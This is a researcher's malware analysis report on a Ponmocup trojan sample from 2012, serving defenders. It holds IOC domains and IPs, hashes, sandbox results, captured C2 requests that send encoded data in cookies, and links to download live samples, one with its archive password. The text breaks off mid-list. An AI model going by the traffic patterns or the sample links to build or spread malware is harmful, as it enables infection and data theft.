-------------------------------------------------------------------------------- analysis done by @c_APT_ure ---------------------- UPDATE 2012-10-07: - after reboot suspended malware process using process explorer - used Mandiant's Memoryze to create full memory dump - analyzed memory dump with Maindiant's Redline, extracting malware proc's memory - results are shown in the following screenshot: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/screenshots/17.png you can download the extracted malware process from here: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/AcquiredFiles.zip IMPORTANT: zip pwd = safe ---------------------- screenshots of malware infection and analysis: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/screenshots.zip malware samples, PCAP, registry extract: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/samples_analysis.zip GFI sandbox PDF report: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis_20972_584fe856bb348e0089f7b59ec31881a5.pdf blog posts about Ponmocup malware on my blog: http://c-apt-ure.blogspot.com/search/label/ponmocup *** this is a quick analysis report -- a more elaborate blog post should follow as soon as I find time *** -------------------------------------------------------------------------------- overview notwork analysis: * redirect domain: kritikaa.ilanes.com 178.211.33.205 * malware download: ml.buymeaslut.com 82.211.45.82 * C2 / phone home: intohave.com 64.179.44.188 (DNS request only) 88.216.164.117 * URL sample #1: http://88.216.164.117/entries (2 x requests with data in cookie values) * URL sample #2: http://88.216.164.117/videos/forumdisplay.php (2 x requests with data in cookie values) -------------------------------------------------------------------------------- * malware download request: GET / HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.google.ch/search?hl=de-CH&source=hp&q=born+to+help&gbv=2&oq=born+to+help&gs_l=heirloom-hp.3..0i19j0i5i19j0i30i19j0i5i10i30i19j0i5i30i19.220656.223094.0.224859.12.11.0.1.1.0.203.999.5j4j1.10.0...0.0...1c.1.JbPIDRfKfZs Accept-Language: de-ch Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: ml.buymeaslut.com HTTP/1.1 200 OK Server: nginx/1.1.17 Date: Fri, 05 Oct 2012 13:01:24 GMT Content-Type: application/octet-stream Content-Length: 540672 Last-Modified: Fri, 05 Oct 2012 12:15:04 GMT Connection: close Set-Cookie: PHPSESSID=g2rge5a976j3tv4nbnkoms6552; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: post-check=0, pre-check=0 Accept-Ranges: none Content-Disposition: attachment; filename="goog1e_born_help.exe" MZ......................@...............................................!..L.!This program cannot be run in DOS mode. * malware C2 phone home #1: GET /entries HTTP/1.1 Accept: */* Cookie: IMGURSESSION=Aj_FSTvyWwLzWgs7GhJgq19ajXGkfj02mvMp19BbUoG8XJyJlEAULKoUejZpFa2QKDMHU0rnO3ATtgjR-lgJqX29W0Jr3r1knRjDKB8i-7z_24eMED2H87s1Dq8_PLBpXJ-BTGO4uCj0zagChTKS8x2jPBfHqoKw83p9aQD8vBM1T4Cx3TRi_6pT5GcohblJ_fC; core=phdEJuGzognmLZ9RqubgHOvguHQzF9XIi59m725T8ctqwXdGEGLf1XSBMCehuu90beUfdplAOlXdttr; WC_PERSISTENT=lp5J_CbtSNJF4z5PTWAOsIeA4YfBc-INaJd4NIgQrQjxM9xVvosQDPb_fWDasgJndpxQsADZUiNa0aASmU5OKNWNkUGRhbqxOmSnxGDvv4ZuUn5sYCBOKHSoXUqaVU0xulRENHo8hvNrZ98QIWKCjn7B0vfqfJTOK8yxTNjTCaBrenfYvL7tYVx8ySugNKbAI2pnBgH6uXz0-yU5ri7srlpfEckr9Lr4fJpqmexIfOIjyZoMZJIETvXS5R8iHJd6FCM5Hp9hrLC5ZdVniYsTZQG-UwbIPF9GC6SsLFc8MD6CCrpGBhom1Gg55XdKF52knOptB48MroqVFoiqO27PusAbPWC; freq=59E User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache HTTP/1.1 404 Not Found Server: Apache/1.3.42 Date: Fri, 05 Oct 2012 13:05:58 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 205 Connection: close 404 Not Found

Not Found

The requested URL /entries was not found on this server.

* malware C2 phone home #1: GET /entries HTTP/1.1 Accept: */* Cookie: IMGURSESSION=u5DdFaOKp6mVmR_G9DdlTUbvhAeDVhdoXJJq2nyTKUs0tqH8V0dEYCK-V4bBKJw7ClwlgBFKu09wjATUpc_uMePSmuO2JA6kQyBLnZv0pPxmiz_UT7yCatyo7XqwbQjLLJzlj5iyHTqYEZoVly7O7gr39Dc3x4EjjXhZDfvC9VMgBf-zSdKYTo89cayR4DJiUkvp8RzbEFYV6M3Xz0tBpaOVFCshRLccfQFO0aIllnMxGCTW7_sRoa54eXSiiefzCNZneNoOyBdKi6lESPohngP9qQrKeHM_lRlsDfOG4DprArY1JmLlB-; core=oVsNrwHtLCaqmyVS_ZttPx4U7w1fPIEDXfmbIHlluw54MOD; WC_PERSISTENT=s6fiLuCW4L_dJJlgbptHfZpd09TSS5obD9d72ZymADD6268aXvIyShoJaKmiLm-ETEKI3jlwMmK7lXWt79sIQ-6VOq5hOUnLUeThis80bEWJ1xMdW0e0P8zKlxTeZPo97R2dE8Nc8y7N2SCYUAA3YNM2usLAe2xPrLaRVebiL9xW_fOY-lD8J_MkE9LpVnsm2HX-EP8m1tvO2jXXDlYIiIqgPufMzX8LYo4BEzvd1hsg9ZWydz6Q0PPK0aPVXllySHMbmOAhavCOzUf6rVw53wp6zOgBS5B_FH2Tm2zr-rTJx7bhpbobgpvCmoWSo0UIjYz90IrYjLTA9-Iy_KvwB_2NcvB_P7MXAO-PhbVs5cyzgMYnHbysMMkRqGZBVqqUf_MNqd75Pn9U_2I-RGQIAys4wdYhAvCudj0ym2n-pl19TOc7Gi2IOQ2zzsjtJt8fQASa5wqNpI4Zgy3h-o2milJn3duUVw6He1s0vCVrxqI_MCCLwT9WqvHAmq_C9bjd0Q8K20-7mwY-jt0N5HXWu6x0bvg1UnRRS8vjphWthx8T0pnDucwV46KJP9cML; INTUIT_SESSIONID=lB User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache HTTP/1.1 404 Not Found Server: Apache/1.3.42 Date: Fri, 05 Oct 2012 13:06:01 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 205 Connection: close 404 Not Found

Not Found

The requested URL /entries was not found on this server.

-------------------------------------------------------------------------------- https://www.virustotal.com/file/21742fc621f83041db2e47b0899f5aea6caa00a4b67dbff0aae823e6817c5433/analysis/1349466981/ SHA256: 21742fc621f83041db2e47b0899f5aea6caa00a4b67dbff0aae823e6817c5433 SHA1: 8b74212c97df1e527446149ca497829b1681d8e2 MD5: 584fe856bb348e0089f7b59ec31881a5 File size: 528.0 KB ( 540672 bytes ) File name: google_born_help.exe File type: Win32 EXE Tags: peexe armadillo Detection ratio: 2 / 42 Analysis date: 2012-10-05 19:56:21 UTC ( 13 minutes ago ) Fortinet W32/Kryptik.KO!tr 20121005 Symantec Suspicious.Cloud.5 20121005 ssdeep 12288:tTWmd9BKKvcgSOJY8E7n5JnzBFXlQwuHo8PGRgv:NWmdN2OJObbBF1u33 TrID Generic Win/DOS Executable (49.9%) DOS Executable Generic (49.8%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.1%) PEiD packer identifier Armadillo v1.71 ExifTool MIMEType.................: application/octet-stream Subsystem................: Windows GUI MachineType..............: Intel 386 or later, and compatibles TimeStamp................: 2008:07:21 14:37:00+01:00 FileType.................: Win32 EXE PEType...................: PE32 CodeSize.................: 53248 LinkerVersion............: 6.0 EntryPoint...............: 0x88c9 InitializedDataSize......: 491520 SubsystemVersion.........: 4.0 ImageVersion.............: 0.0 OSVersion................: 4.0 UninitializedDataSize....: 0 Portable Executable structural information Compilation timedatestamp.....: 2008-07-21 13:37:00 Target machine................: 0x14C (Intel 386 or later processors and compatible processors) Entry point address...........: 0x000088C9 PE Sections...................: Name Virtual Address Virtual Size Raw Size Entropy MD5 .text 4096 51398 53248 6.43 0469c1a95648b2f4b3c1bb5e82b5b90a .rdata 57344 3000 4096 4.35 4ba6d6d4d52c6816ff6a944c2163a8d6 .data 61440 484680 479232 5.28 16408939970126552338646904c337ef PE Imports....................: [[KERNEL32.dll]] GetSystemTime, GetLastError, HeapFree, GetStdHandle, LCMapStringW, SetHandleCount, GetOEMCP, LCMapStringA, HeapDestroy, ExitProcess, IsBadWritePtr, GetHandleInformation, FlushFileBuffers, LoadLibraryA, RtlUnwind, GetModuleFileNameA, FreeEnvironmentStringsA, GetStartupInfoA, GetEnvironmentStrings, DeleteFileA, WideCharToMultiByte, UnhandledExceptionFilter, MultiByteToWideChar, FreeEnvironmentStringsW, GetCommandLineA, GetProcAddress, SetStdHandle, SetFilePointer, GetCPInfo, GetStringTypeA, GetModuleHandleA, ReadFile, WriteFile, GetCurrentProcess, CloseHandle, IsValidLocale, GetACP, HeapReAlloc, GetStringTypeW, TerminateProcess, HeapCreate, VirtualFree, GetEnvironmentStringsW, GetFileType, SetEndOfFile, CreateFileA, HeapAlloc, GetVersion, VirtualAlloc [[WINSPOOL.DRV]] SetPrinterA, AddJobA, GetPrinterDataA, DocumentPropertiesA, DeviceCapabilitiesA, AddMonitorA, EnumPortsA, EnumFormsA, DeletePrinter, DeleteMonitorA, DeletePrinterConnectionA, GetPrintProcessorDirectoryA, ConfigurePortA, GetPrinterDataExA, EnumPrintProcessorsA, GetFormA, DeletePrinterKeyA, AddPrintProcessorA, GetJobA, DeletePrinterDataA, FindFirstPrinterChangeNotification, AddPrinterA, FindClosePrinterChangeNotification, DeletePrinterDriverExA First seen by VirusTotal 2012-10-05 19:56:21 UTC ( 13 minutes ago ) Last seen by VirusTotal 2012-10-05 19:56:21 UTC ( 13 minutes ago ) File names (max. 25) google_born_help.exe -------------------------------------------------------------------------------- http://anubis.iseclab.org/?action=result&task_id=12c688f81c488b04429bfa813e163710f&format=html unable to analyze! 2.a) google_bor.exe - Registry Activities - Registry Values Read: Key Name Value Times HKLM\?Software\?Policies\?Microsoft\?Windows\?Safer\?CodeIdentifiers TransparentEnabled 1 1 HKLM\?System\?CurrentControlSet\?Control\?Terminal Server TSUserEnabled 0 1 -------------------------------------------------------------------------------- http://malwr.com/analysis/584fe856bb348e0089f7b59ec31881a5/ File Details Analysis Package: None specified, automatically selected Analyzed on: 2012-10-05 13:13:01 PST Duration: 23 seconds File name: google_born_help.exe File size: 540672 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: 584fe856bb348e0089f7b59ec31881a5 SHA1: 8b74212c97df1e527446149ca497829b1681d8e2 SHA256: 21742fc621f83041db2e47b0899f5aea6caa00a4b67dbff0aae823e6817c5433 SHA512: 6dfe3bea7a9c2c42ad129cd7cf9a61c47ebbe0977bb89900957b9723eedf70f764e2677f36afd48ace4ab0ad982989d406c5e8175d62d003017212a096a5c70a CRC32: 3D73ED66 Ssdeep: 12288:tTWmd9BKKvcgSOJY8E7n5JnzBFXlQwuHo8PGRgv:NWmdN2OJObbBF1u33 Analysis Errors [2012-10-05 13:13:24,802] [Core.DumpFiles] ERROR: Something went wrong while dumping file from "C:\WINDOWS\system32\wdigestl.exe" to "C:\cuckoo\files": [Errno 13] Permission denied: 'C:\\WINDOWS\\system32\\wdigestl.exe'. Process Tree google_born_help.exe (1540) wdigestl.exe (776) cmd.exe (1848) Behavior Analysis Process google_born_help.exe, PID 1540 + Process wdigestl.exe, PID 776 , Parent PID 1540 + Process cmd.exe, PID 1848 , Parent PID 1540 + Network Analysis DNS Requests + Hostname IP Address intohave.com 64.179.44.188 HTTP Requests + URL Data http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=-Ye_hb; clogid=OkT_NvmO29; nonsession=K; id=03tfljDBHUy0f_Hbkka-50cGuA--M5T1-9hwK1Kon8KBZfclzUES479ObsMsKkQyS97U3bcEWAmhbkEzj6Gk2mzmmRuJKOOZIDzRKJJIMBIddATjqq4X8MQy_tuuW7Bf9YHRZT55YNec9jIXV8PHcQy2Y_y2SaaBPsOptqtQIqN5sehMZFn98EIrcHgrbRxpQkFRCPD92sTwSJTxdGz-MBO-h-JKgZToVcPW_juAr5EoOuVWvNdq033OHcby5K5rUJYYtLiJ7XUB3lZ1yhcpahjGQo3ZamBE6TS_hUco0B-LKyPfk-5UBamh3RW6GqXwKbXffRFi1w33HT_NKrH8S4pJYdyYxJExBMy2FCbJ4PySr7pzDzPg7QRKHTLhFXf_CvHxUooq1K1A7YEVEe1OtOtINp4uyJunoa9ONJxwEVxIGnT7MaPckad2BY69lNuj7_ODCND6ASuubzuqRNpH702meeWL9TUSzw74OvlX4QB3IWfLGodh351AcaHCPD-4x3HW_nEgQUiF99H75Sm7YTDmdFS7lD_oUqDovxVDATFsYq7NIuqP3s-VLQ1gnMqvOn9oC9IJwELXYBHBpeebGNp1Rc0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=HvXeEIkoaNHcdjbFhrOA79dRlB9bcmmM_levineaKVo3GhQdaSFScQg1nu4iD4AkTWUCSxP2YOMKSpVq0PapQ5aHxZpHt; clogid=7djKtW298fxzKqjAI4yxjOIaRZc1EAKYS8F-_v8hax2WfB6ORxZdW_Hi58yMU69TqtQ463DcahaL35ywKWHzdWBoUtmZvS3j-jYRXISORUcIsQ8014h6NjGObobOFviB51c6q1YpBmmH7HWL1SN4nfh5lGqwCi6nSoQHWbHbc7SQ_xeXI7kqPzkxTL_tE5h0jRAPsTkwI9H49eND4OCf_9nX-RSrXyVHMKUIpZEBir-tlRJDCtUA6ZL5F245hYl83-BkRJXqZLcox3b2lsUhfgGyKz7RS10YsvDmBhDVzQL1BMeDMUZPcIS7KSgAQeV-X46u0c11C99GZP9ptD; ARSiteUser=server=p0dckTP4g70iNqIwFb0attp5pDmui34KcHyQDC9cEPCPPndZu; _thepoint=19vx81J6bYQnQwBinKl6jj-RAmLAT1aAx7Sx90tx8ds1h6bPX9zktyTHss0Vh_7U0HrAkuzr4sNapDQkBxj442QVF95PXwtjPjSJEJjt0_YJ-bJwWuri_9oRHXkEDeJPryEMss7d-mfG4goQhNbXGaJMIN-z48KNLimbZOkDsq60IDuCb0jKcQTg-o1Xs7MSUW2EAyoBDvQKMRg-AAC15lgkd3XEAKKcUCIp9Wi6txPsLHwEHuKRBJi8cKeGe_OxueeehTJkRl4M56kIg9GZFdQywX4ZypYbjSpdgDP-NWSVYtXB131d_uLJloruR9oOKosLBW3WMcAZ8Z3U57Ufifl8S7h6-QREeyTvzmdl976rjUcjnfZKGdy264ejlJRSMsmk6yoQKWKmBzgpsvVEp-kPm9OJ1fmzKMXqtizeN1oeT799nNPP57sfwvyEQ_Qc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache Static Summary The binary is packed, a known packer has been identified Sections + Name Virtual Address Virtual Size Size of Raw Data Entropy .text 0x1000 0xc8c6 0xd000 6.4266190735933 .rdata 0xe000 0xbb8 0x1000 4.3481853656296 .data 0xf000 0x76548 0x75000 5.2767602450483 Dropped Files File: google_born_help.exe + File size: 540672 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: 584fe856bb348e0089f7b59ec31881a5 SHA1: 8b74212c97df1e527446149ca497829b1681d8e2 SHA256: 21742fc621f83041db2e47b0899f5aea6caa00a4b67dbff0aae823e6817c5433 SHA512: 6dfe3bea7a9c2c42ad129cd7cf9a61c47ebbe0977bb89900957b9723eedf70f764e2677f36afd48ace4ab0ad982989d406c5e8175d62d003017212a096a5c70a CRC32: 3D73ED66 Ssdeep: 12288:tTWmd9BKKvcgSOJY8E7n5JnzBFXlQwuHo8PGRgv:NWmdN2OJObbBF1u33 File: ~unins5796.bat + File size: 49 bytes File type: DOS batch file text MD5: 9e0a2f5ab30517809b95a1ff1dd98c53 SHA1: 5c1eefdf10e67d1e9216e2e3f5e92352d583c9ce SHA256: 97ac9fee75a1f7b63b3115e9c4fb9dda80b1caba26d2fb51325670dee261fe32 SHA512: e959cc1fd48fb1cccf135a697924c775a3812bab211fc7f9b00c5a9d617261d84c5d6f7cb548774c1e8f46811b06ca39c5603d0e10cbcb7b805f9abbe49b9b42 CRC32: 30096EA5 Ssdeep: 3:mKDDryGAdPfeZ2sn:hRAdOxn -------------------------------------------------------------------------------- https://www.vicheck.ca/md5query.php?hash=584fe856bb348e0089f7b59ec31881a5 Malware Hash Query This utility queries our own database, VirusTotal.com, TheatExpert.com, and Team-CYMRU for known malware hashes and links to analysis reports. Hash: File: google_born_help.exe File size: 540672 bytes File type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 584fe856bb348e0089f7b59ec31881a5 SHA1: 8b74212c97df1e527446149ca497829b1681d8e2 SHA256: 21742fc621f83041db2e47b0899f5aea6caa00a4b67dbff0aae823e6817c5433 SSDEEP: 12288:tTWmd9BKKvcgSOJY8E7n5JnzBFXlQwuHo8PGRgv:NWmdN2OJObbBF1u33 Reported: 2012-10-05 20:38:35 Detection engine: 212 Result: Scan skipped - see sandbox only - file format executable Confidence: 50 Scan hits: 1 Detected entities: https://www.vicheck.ca/searchsb.php?server=intohave.com -------------------------------------------------------------------------------- GFI Sandbox results SandBox results for google_born_help.exe Analysis ID: 20972 Date Analyzed: 2012-10-05 16:34:40 Sandbox Attributes: IE 9, Office 2003, Adobe Reader 9.4, Flash 10.1, Java 6 MD5 Hash: 584fe856bb348e0089f7b59ec31881a5 Filename: google_born_help.exe File Type: PE32 executable for MS Windows (GUI) Intel 80386 3 Digital Behavior Traits Injected Code NO More than 5 Processes NO Copies to Windows NO Windows/Run Registry Key Set YES Makes Network Connection YES Creates EXE in System NO Starts EXE in System YES Starts EXE in Documents NO Deletes File in System NO Hooks Keyboard NO Creates Hidden File NO Creates DLL in System NO Creates Mutex YES Alters Windows Firewall NO Checks For Debugger NO Could Not Load NO Opens Physical Memory NO Modifies Local DNS NO Starts EXE in Recycle NO Creates Service NO Modifies File in System YES Deletes Original Sample YES full PDF report: http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis_20972_584fe856bb348e0089f7b59ec31881a5.pdf -------------------------------------------------------------------------------- http://eureka.cyber-ta.org/OUTPUT/584fe856bb348e0089f7b59ec31881a5/ http://eureka.cyber-ta.org/OUTPUT/584fe856bb348e0089f7b59ec31881a5/strings.txt http://eureka.cyber-ta.org/OUTPUT/UNIQUE/c6b3699ceaeafdfd3141d2ae7684c100/c6b3699ceaeafdfd3141d2ae7684c100_unpacked.asm.html http://eureka.cyber-ta.org/OUTPUT/584fe856bb348e0089f7b59ec31881a5/584fe856bb348e0089f7b59ec31881a5_c6b3699ceaeafdfd3141d2ae7684c100_unpacked.exe --> unpacked EXE download -------------------------------------------------------------------------------- https://www.virustotal.com/file/89e5b333e301dd0fa0458d33c9b353ca6380f180ae1cb49fa0411c14e7156d48/analysis/1349471791/ SHA256: 89e5b333e301dd0fa0458d33c9b353ca6380f180ae1cb49fa0411c14e7156d48 SHA1: 8b75db54db6ab76adaf9ae9dfe19885aa21c005b MD5: c6b3699ceaeafdfd3141d2ae7684c100 File size: 536.0 KB ( 548864 bytes ) File name: 584fe856bb348e0089f7b59ec31881a5_c6b3699ceaeafdfd3141d2ae7684c100_unpacked.exe File type: Win32 EXE Detection ratio: 3 / 43 Analysis date: 2012-10-05 21:16:31 UTC ( 1 minute ago ) AntiVir TR/Crypt.XPACK.Gen 20121005 ByteHero Virus.Win32.Heur.c 20120918 Fortinet W32/Agent.XOT!tr 20121005 ssdeep 12288:STWma9BKKvcgSOJY8E7n5JnzBFXlQwuHo8PGRgv:yWmaN2OJObbBF1u33 TrID Generic Win/DOS Executable (49.9%) DOS Executable Generic (49.8%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.1%) PEiD packer identifier Armadillo v1.71 ExifTool MIMEType.................: application/octet-stream Subsystem................: Windows GUI MachineType..............: Intel 386 or later, and compatibles TimeStamp................: 2008:07:21 15:37:00+02:00 FileType.................: Win32 EXE PEType...................: PE32 CodeSize.................: 53248 LinkerVersion............: 6.0 EntryPoint...............: 0x88c9 InitializedDataSize......: 491520 SubsystemVersion.........: 4.0 ImageVersion.............: 0.0 OSVersion................: 4.0 UninitializedDataSize....: 0 Portable Executable structural information Compilation timedatestamp.....: 2008-07-21 13:37:00 Target machine................: 0x14C (Intel 386 or later processors and compatible processors) Entry point address...........: 0x000088C9 PE Sections...................: Name Virtual Address Virtual Size Raw Size Entropy MD5 .text 4096 51398 51398 6.56 0349ea94a646fb07b4da0ac9c6de10bd .rdata 57344 3000 3000 5.69 3862ddee8c2ed3e06944acc5afd8ba74 .data 61440 484680 484680 5.24 2184909af19ce9a34a57b8fe61e400a4 .idata2 548864 4096 512 0.00 bf619eac0cdf3f68d496ea9344137e8b Symantec Reputation Suspicious.Insight First seen by VirusTotal 2012-10-05 21:16:31 UTC ( 2 minutes ago ) Last seen by VirusTotal 2012-10-05 21:16:31 UTC ( 2 minutes ago ) File names (max. 25) 584fe856bb348e0089f7b59ec31881a5_c6b3699ceaeafdfd3141d2ae7684c100_unpacked.exe -------------------------------------------------------------------------------- http://reports.antivirus-lab.com/191204/artemis53718a58efe1/ Artemis!53718A58EFE1 September 10th, 2012 File Name: 53718a58efe186e9d9b67b52ae10a22e.exe DB Updates: 10.09.2012 20:00:57 Check: [Clean] MD5: 53718A58EFE186E9D9B67B52AE10A22E ssdeep: 12288:3ysy92XXyHJboPMaCSfW7wmOll/uwRYvjIq4wVVmiGhPWSVc4:3Fy92XXyHJeZXvlTRYdLVVlGMSqG Size: 790528 PE64: False System: Win32 GUI Entry point: 55 8B EC 6A FF 68 B8 51 42 00 68 E0 0F 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 90 50 42 00 33 D2 8A D4 89 15 C4 09 4C 00 8B C8 81 E1 FF 00 00 00 89 0D C0 Internet connection 88.216.164.117:80 McAfee: Artemis!53718A58EFE1 Symantec: Trojan.Gen Norman: W32/Suspicious_Gen5.GVOK TrendMicro-HouseCall: TROJ_GEN.RCBC7I7 Avast: Win32:Trojan-gen eSafe: Win32.Trojan Kaspersky: Trojan.Win32.Pirminay.shv BitDefender: Gen:Variant.Symmi.226 Comodo: TrojWare.Win32.Trojan.Agent.Gen F-Secure: Gen:Variant.Symmi.226 DrWeb: Trojan.DownLoader6.51791 VIPRE: Trojan.Win32.Generic!BT AntiVir: TR/Symmi.226.34 TrendMicro: TROJ_GEN.RCBC7I7 McAfee-GW-Edition: Artemis!53718A58EFE1 Emsisoft: Virus.Win32.Cryptor!IK Microsoft: Trojan:Win32/Vundo ViRobot: Trojan.Win32.A.Pirminay.790528.A GData: Gen:Variant.Symmi.226 ESET-NOD32: Win32/Ponmocup.AA Ikarus: Virus.Win32.Cryptor AVG: Win32/Cryptor Panda: Generic Trojan -------------------------------------------------------------------------------- http://malwr.com/analysis/d6b6378be852d33c0b733d3cb3b0a510/ File Details Analysis Package: None specified, automatically selected Analyzed on: 2012-08-23 08:12:02 PST Duration: 22 seconds File name: d6b6378be852d33c0b733d3cb3b0a510.malware.exe File size: 806912 bytes File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit MD5: d6b6378be852d33c0b733d3cb3b0a510 SHA1: 813243fcf9eeaaa7eb70d93b767a9da3bb4b2272 SHA256: 616d904ea2bdfc6d0abd598b654a7c3307cd44888fbc20417b72382190e2650b SHA512: b90c0187fa95931e4d4d298fc58e9f9af4d945046ada7cefde49cc856c89573949bc93f315460c8fc90d240c524acfe4149036364c5a60c927ec4a06ddb8f54f CRC32: 8B91F89F Ssdeep: 12288:VqRpO7oXkjozHjy6R2kIPPGKZKOUcFunxwZzLQcT74FML7:VqfIoyozHu6y3GBDecwZZGML7 Network Analysis DNS Requests + Hostname IP Address intohave.com 64.179.44.188 HTTP Requests + URL Data http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=HLyHWUCMpJh-uxnWZpZmqnFKw2NpNB9M_BbJSb52gaw8_uRziyq5EsphVcC9JFR; clogid=DE1XoN2kYNpAhJysTXU9WcAuvcxmvuDGRRa16UYX6NRnFNGVd8L5bnwd2H8GO5Ekqj7HqG7g_Slt; ARSiteUser=server=wFPLKlAYQxN-MIdqY5qDqDgQcstdQ5fld566ia8meOPhDaOFP7; _thepoint=eIlbzmg90JPH243QJGMtXQJN7PdDiMqtjB_aLqUQwxDXb5V3wSrAqePDl8Qc1UNvJl0SE-mj-DCeA9OjEzl3-8AFl83L8VJP8MQEVw5EAgcVzkc2V8po00UMTEPtCJh4imVqj40P6LfNcL1iuOVYAAhvSUSqVndfJJYo_wz9J6raj8cX7jwzUUTf7G7uyRVOq8LBvm0YxXuURX8Bj2QgsMoW5RZLs42ixATtFt09312FzuYbpxy1oa7XD6Ak-ufZTT2X8YQ9rOtqY82kcGU3e6toi7D7Ctp9vgjXBGge8P2Lwdd8JIfRLyHnc8G0UBLPLDbuT2Sooh35XUIf_njBsi1ew1Ee9YOlXQ-U0yW_zGijCBxjBFdWlvdqRq7_m-yx9Jwtz3kSfuxGyBjQtao1loz_Ujt92IoWUW2VgNDiKbiQDS0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache http://88.216.164.117/videos/forumdisplay.php GET /videos/forumdisplay.php HTTP/1.1 Accept: */* Cookie: uid=referringpath=5L17BOpLsHHnRQY6UH84CDPZxfQ2cUK3k6D3PqUtHHAxJR-wBugt09_mBkAG57ZdAVzVRkdvP2Ng6YpVFFVQ3Z2QXF4Zo3cnJ6i7jW9VUphjwoBCKDr2jHpqY57jXKl5xfa8-WlE7Yia3xJuGVywoT9U6lvHqG4IFI7PYJE84m1X4LBxfVXln5N0f5XonCyVJOYAj3JQ01nA; clogid=vgKi9PSZ23zzAA646jbkpAx5WNavx39XHIKac9EnLqvF465L6c9RIbTk-3-KIN2QbqFCkB30hYd0TQzkSgcNm9mkoUAEjkf_6RUM2uBELstgNGAfeOS-QjyGLJPxYbdcd5A1wKc1Pxe02eOyMWOT37DyaB1v1Z5qujMxrmSzjpIXnHKUYrfn1qTfUEWz9etKlIY0kImAuijgMDXTb_qdeKCDKZnGAog1J833D1lzOWT6963Kkr3MJpWBuR60gD6E; ARSiteUser=server=fcLQrgMB_jg4f76L1MaBAKgfhjc2wwqjih-yFAwQOtASsPt-fUO-HysuySh1qL7tmg0ZsDFp3kD_u8uhkTKQ6TZnzvBpMiU20f9JTEg2WHzr7KP94bGFsKbmd_9HNBpQO142WVBo__ao8Mp1LW5GayCGXQ7T3UIjA; _thepoint=PCK3qME-EKrLzGxNSdf1lkkLXWfLDU-UNZzaKkRirj10YJQTJTaxMUC7F3x7UvcZ1p_w8Mvywpy6s1nPcy9U1SnHsM2mPhxxSX7eEMq9U8PGctRNtYspcZMlcJcLergR3Tjx3HsS6GKzXG9TRxSvKvtOFpX2ZnHl_IKRIWQpz-u4ap6IzsVvGPVQ0aM2I9VNZh3i1B4T8B7wnM1kXNxcKUL1rA85qTsjUxRZJZMGYgLDrh3ow7KiXJviTC_lWpdg8Jc_akNNvgPPrQSvp6-LCEmYpnNl_u_snuAjumjWZHYUriipLMn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Host: 88.216.164.117 Connection: Close Cache-Control: no-cache Pragma: no-cache -------------------------------------------------------------------------------- Google search: site:malwr.com intohave.com Malwr - Analysis of f6b2c8b2137b4d3e94a746c7cd5741ed malwr.com/analysis/f6b2c8b2137b4d3e94a746c7cd5741ed/ 27 Sep 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of 36733a3a399d11c1dfcc2a61b030d788 malwr.com/analysis/36733a3a399d11c1dfcc2a61b030d788/ 5 days ago Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of a86e83dcb3067cf5b6c12a9da0b44fa2 malwr.com/analysis/a86e83dcb3067cf5b6c12a9da0b44fa2/ 26 Sep 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of bb633fa638107050380c821cee9d61cf malwr.com/analysis/bb633fa638107050380c821cee9d61cf/ 19 Sep 2012 Hostname, IP Address. intohave.com, 64.179.44.188. HTTP Requests +. URL, Data. http://88.216.164.117/videos/forumdisplay.php ... Malwr - Analysis of a39517b9d610d58563e5bc93c52c8a79 